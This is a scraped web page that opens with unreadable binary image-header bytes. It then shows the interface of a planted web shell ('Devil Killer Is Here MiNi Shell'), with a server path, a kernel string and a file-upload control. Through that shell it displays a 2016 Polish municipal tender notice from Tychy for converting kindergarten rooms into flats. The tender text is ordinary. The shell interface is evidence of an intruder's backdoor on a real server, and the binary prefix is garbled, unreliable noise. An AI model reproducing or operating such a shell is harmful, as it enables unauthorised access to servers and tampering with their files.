JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160304/49010-N-2016.html

<p class="kh_header"><b>Tychy: WYKONANIE ROBÓT BUDOWLANYCH  DLA ZADANIA INWESTYCYJNEGO PN.:  
ZMIANA SPOSOBU UŻYTKOWANIA POMIESZCZEŃ PRZEDSZKOLNYCH 
     Z PRZEZNACZENIEM NA LOKALE MIESZKALNE PRZY UL. CIELMICKIEJ 45</b><br>
<b>Numer ogłoszenia: 49010 - 2016; data zamieszczenia: 04.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzbm.tychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ROBÓT BUDOWLANYCH  DLA ZADANIA INWESTYCYJNEGO PN.:  
ZMIANA SPOSOBU UŻYTKOWANIA POMIESZCZEŃ PRZEDSZKOLNYCH 
     Z PRZEZNACZENIEM NA LOKALE MIESZKALNE PRZY UL. CIELMICKIEJ 45.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zgodnie z projektem budowlanym robót budowlanych polegających na przebudowie i zmianie sposobu użytkowania pomieszczeń przedszkolnych
z przeznaczeniem na lokale mieszkalne w budynku mieszkalnym wielorodzinnym położonym na parceli nr 980/120 przy ul. Cielmickiej 45 w Tychach. 

2.	Zakres zamówienia obejmuje m.in.: 
      -  przebudowę pomieszczeń byłego przedszkola dla potrzeb budowy 6 lokali mieszkalnych  
      -  wykonanie robót rozbiórkowych
      -  wykonanie robót konstrukcyjnych 
      -  wykonanie robót murarsko- tynkarskich i posadzkowych
      -  montaż stolarki okiennej i drzwiowej
      -  wykonanie robót wykończeniowych
      -  wykonanie robót izolacyjnych
-  wykonanie instalacji: elektrycznej, wod-kan, c.o. 
-  wykonanie robót elewacyjnych - ocieplenie elewacji, 
-  wymianie rynien i rur spustowych wraz  wymianą obróbek 
-  wykonanie robót towarzyszących

2.1.	Szczegółowy zakres robót zawiera przedmiar robót stanowiący załącznik do SIWZ. 
3.   Zamawiający dopuszcza zastosowanie materiałów innych - tzw. równoważnych o 
     parametrach i właściwościach nie gorszych niż wskazane w dokumentacji projektowej
     i przedmiarze robót stanowiących integralną część SIWZ, tj. takich , które warunkują 
     zrealizowanie przedmiotu zamówienia zgodnie z dokumentacją projektową. Jeżeli Wykonawca 
     przewidzi w ofercie zastosowanie materiałów równoważnych, na wykonawcy ciąży obowiązek 
     udowodnienia ich równoważności. Brak jednoznacznego wskazania w ofercie materiałów 
     równoważnych oznaczać będzie wykonanie przedmiotu zamówienia z zastosowaniem 
     materiałów wskazanych w załączonych do SIWZ dokumentów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej 
          ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na zasadach
          określonych w art. 67 ust.1 pkt 6) ustawy - PZP.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.27.00-8, 45.26.24.23-2, 45.43.21.10-8, 45.42.11.30-4, 45.26.25.22-6, 45.41.00.00-4, 45.44.21.00-8, 45.30.00.00-0, 45.33.24.00-7, 45.11.12.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości:                              
12 500,00 zł (słownie: dwanaście tysięcy pięćset złotych zero groszy) - na czas związania ofertą. 
2.	Wadium musi być wniesione przed upływem terminu składania ofert.
3.	Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę przetargu.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
                                 Bank Pekao S.A.
                                 Nr rachunku bankowego: 86 1240 2975 1111 0010 6583 2252
Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,                    
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 , z późn. zm.).
5.	W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia  wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4),</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania spełniania warunku udziału w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy PZP), Zamawiający wymaga złożenia  następujących dokumentów:
1)	  wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem  
       terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
       wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania -  w którym należy wykazać
       co najmniej dwie roboty budowlane w zakresie zmiany sposobu użytkowania pomieszczeń 
       z przeznaczeniem na lokale mieszkalne (zrealizowane w zamieszkałym budynku mieszkalnym 
       wielorodzinnym -każda z robót), o wartości nie mniejszej niż 450 000,00 zł (brutto) - każda 
      z robót

    
         Wykaz robót należy sporządzić wg wzoru druku stanowiącego załącznik nr 3 do SIWZ.
(W przypadku podmiotów występujących wspólnie niniejsze warunki udziału podmioty mogą spełniać łącznie   
 lub co najmniej jeden podmiot).

2)	Do wykazu należy dołączyć dowody dotyczące najważniejszych robót , określających, czy 
     roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane 
     zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania spełniania warunku udziału w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania
     osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP)        
       Zamawiający wymaga złożenia następujących dokumentów:

  1)  wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 
        odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami 
       budowlanymi , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
       i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
       przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.	
       Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,   
       w szczególności:
a)	co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności konstrukcyjno
       - budowlanej (do kierowania robotami ), z co najmniej 5 letnim doświadczeniem w zakresie 
 pełnienia funkcji kierownika robót;    
  
  b)   co najmniej jedną osobą posiadającą uprawnienia do wykonywania pracy na stanowisku           
        eksploatacji w zakresie obsługi, konserwacji, remontów, montażu kontrolno- pomiarowym 
        dla urządzeń, instalacji i sieci gazowych, z co najmniej 5 letnim doświadczeniem;

  c)   co najmniej jedną osobą, posiadającą uprawnienia do wykonania pracy na stanowisku 
        eksploatacji urządzeń i instalacji elektroenergetycznych o napięciu do 1 kV , z co najmniej 
        5 letnim doświadczeniem;

d)  co najmniej jedną osobą posiadającą uprawnienia do wykonywania pomiarów ochron
        przeciwporażeniowych i instalacji odgromowych, z co najmniej 5 letnim doświadczeniem;
        Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik nr 4 do SIWZ.






2)	  oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają 
        wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

         Oświadczenie należy sporządzić wg wzoru stanowiącego załącznik nr 5 do SIWZ.  

(W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą spełniać łącznie 
 lub co najmniej jeden z wykonawców).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  Wykonawca spełnia warunek udziału dotyczący posiadania 
       wymaganej sytuacji ekonomicznej i finansowej (art. 22 ust. 1 pkt  4) ustawy PZP), 
       Zamawiający wymaga, złożenia następujących dokumentów: 
1)	informacji banku lub spółdzielczej kasy oszczędnościowo- kredytowej potwierdzającej 
 wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy,   
 wystawionej nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.

 -  Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże zdolność kredytową lub 
 dysponowanie środkami finansowymi w wysokości nie mniejszej niż 450 000,00 zł ( słownie:   
 czterysta pięćdziesiąt tysięcy złotych)

2)	 opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że 
       Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
       działalności związanej z przedmiotem zamówienia.
        Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ww. 
        dokument o wartości ubezpieczenia nie mniejszej niż 450 000 zł (czterysta pięćdziesiąt tysięcy 
        złotych zero groszy).
        Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia musi 
        wynikać z treści dokumentu polisy.
        Jeżeli fakt opłacenia polisy potwierdzającego, że Wykonawca jest ubezpieczony od 
        odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem 
        zamówienia, nie wynika wprost z załączonego do oferty dokumentu Wykonawca jest 
        zobowiązany dołączyć inny dokument potwierdzający opłacenie składki (np. kopia przelewu  
        składki, potwierdzenie ubezpieczyciela).
(W przypadku podmiotów występujących wspólnie niniejszy warunek udziału podmioty mogą spełniać      
 łącznie lub co najmniej jeden podmiot).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku stanowiącego załącznik nr 1 do SIWZ,
2)	stosowne pełnomocnictwo (a) do działania w imieniu Wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu 
z właściwego rejestru;
3)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego;
4)	kosztorys ofertowy ze zbiorczym zestawieniem nakładów robocizny, materiałów i sprzętu;
5)	oświadczenia i dokumenty wymienione w rozdziale V ust. II niniejszej specyfikacji.
6)  Zgodnie z art. 26 ust. 2b ustawy - PZP, Wykonawca może polegać na wiedzy 
        i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, 
         zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru    
         prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest 
         udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji 
         zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych 
         podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania 
         zamówienia. Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien 
         wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy ubiegającego się 
        o zamówienie odpowiedniego zasobu oraz wskazywać:
       -   jaki jest zakres dostępnych Wykonawcy zasobów innego podmiotu,
       -   w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez Wykonawcę przy 
            wykonywaniu zamówienia,
       -   jakiego charakteru stosunki będą łączyły Wykonawcę z innym podmiotem,
       -   jaki jest zakres w jakim okresie inny podmiot będzie brał udział przy wykonywaniu
            zamówienia.
Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego, powinien być 
podpisany wyłącznie przez osoby upoważnione na piśmie lub wpisane w odpowiednich dokumentach rejestrowych w imieniu reprezentowanego podmiotu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin płatności - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku 
      do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących 
      przypadkach:
1)	 zmian personalnych, adresowych, formy prawnej stron umowy;
2)	 zmiany osoby/osób odpowiedzialnych za realizację robót;
   3) zmiany podwykonawcy robót w trakcie trwania umowy - za zgodą Zamawiającego;
         4) wykonania robót zamiennych;
     5) zmiany wynagrodzenia należnego Wykonawcy, w przypadku zmiany stawki podatku od 
         towarów i usług. 
6)	zmiany terminu realizacji przedmiotu umowy, w następstwie:
        a)  wystąpienia okoliczności, które nie zostały przewidziane na etapie prowadzenia 
             postępowania;    
        b)  wystąpienia robót dodatkowych nie objętych zamówieniem podstawowym, których             
             wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do 
             przewidzenia, jeżeli:
        -   z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego 
            od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów,
            lub
       -   wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia 
           dodatkowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzbm.tychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2016 godzina 10:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





